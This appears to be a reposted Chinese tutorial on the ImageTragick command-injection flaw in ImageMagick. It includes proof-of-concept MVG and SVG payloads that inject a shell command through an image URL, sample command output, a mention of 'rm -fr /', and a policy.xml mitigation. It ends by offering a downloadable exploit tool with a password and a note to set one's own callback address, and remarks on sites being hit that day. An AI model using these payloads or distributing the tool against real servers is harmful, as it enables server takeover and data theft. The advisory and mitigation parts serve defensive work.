首页 / 更多教程 / 上传个图片都能拿下服务器!赶紧自检!
上传个图片都能拿下服务器!赶紧自检!
内容导读
互联网集市收集整理的这篇技术教程文章主要介绍了上传个图片都能拿下服务器!赶紧自检!,小编现在分享给大家,供广大互联网技能从业者学习和参考。文章包含2304字,纯文字阅读大概需要4分钟。
内容图文
![上传个图片都能拿下服务器!赶紧自检!](/upload/InfoBanner/zyjiaocheng/1014/baa6ef2b04a5410ab2dc293488edbcef.jpg)
网站上的图片相关功能可以被***利用秒取网站服务器控制权!比如传一张图直接就给服务器关机,或执行 “rm -fr /” 删除文件,再或窃取用户敏感数据等,而造成这些后果的只是一张特殊的图片…
这个时候不得不喊出口号「睡你麻痹,起来 High」,上次 Struts 2 漏洞席卷全球还有余温,这次核弹级漏洞 ImageTragick 来了!赶紧检查自家服务,今夜别睡!
~~~~~~~~~~~~~~~
[紧急预警]
关于 ImageTragick 漏洞(官网):
https://imagetragick.com/
官网上已经给出了好几种测试姿势,比如:
ImageTragick 相关漏洞挖掘测试和漏洞影响自查,请参考:
http://www.imagemagick.org/script/api.php
可以看到数目繁多,用了如下组件的都可能受此漏洞影响:
~~~~~~~~~~~~~~~~~~~~~~~~
漏洞产生的原因是 ImageMagick 使用 system() 指令调用来处理 HTTPS 请求,而对用户传入的 shell 参数没有做好过滤,导致能注入任意指令执行。
EXPOLIT
exploit.mvg
-=-=-=-=-=-=-=-=-
push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg"|ls "-la)'
pop graphic-context
exploit.svg
-=-=-=-=-=-=-=-=-
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg width="640px" height="480px" version="1.1"
xmlns="SVG namespace" xmlns:xlink=
"XLink namespace">
<image xlink:href="https://example.com/image.jpg"|ls "-la"
x="0" y="0" height="640px" width="480px"/>
</svg>
$ convert exploit.mvg out.png
total 32
drwxr-xr-x 6 user group 204 Apr 29 23:08 .
drwxr-xr-x+ 232 user group 7888 Apr 30 10:37 ..
...
最后看一下,有那些网站今天被人搞了!!
~~~~~~~~~~~~~~~
临时防护建议(by imagetragick.com):
使用配置文件暂时禁用 ImageMagick 的部分编码器,可在 “/etc/ImageMagick/policy.xml” 文件中添加如下代码:
<policymap>
<policy domain="coder" rights="none" pattern="EPHEMERAL" />
<policy domain="coder" rights="none" pattern="URL" />
<policy domain="coder" rights="none" pattern="HTTPS" />
<policy domain="coder" rights="none" pattern="MVG" />
<policy domain="coder" rights="none" pattern="MSL" />
</policymap>
~~~~~~~~~~~~~~~~~~
说了半天不带工具,那不是刷流氓吗?
这个主要是php调用的,asp,aspx应当不影响,反正我测试了没成功,
需要自己修改上线地址
exp下载链接 链接:?http://pan.baidu.com/s/1c1xhqvu 密码: bw5w
----------------------------------
内容总结
以上是互联网集市为您收集整理的上传个图片都能拿下服务器!赶紧自检!全部内容,希望文章能够帮你解决上传个图片都能拿下服务器!赶紧自检!所遇到的程序开发问题。 如果觉得互联网集市技术教程内容还不错,欢迎将互联网集市网站推荐给程序员好友。
内容备注
版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 gblab@vip.qq.com 举报,一经查实,本站将立刻删除。
内容手机端
扫描二维码推送至手机访问。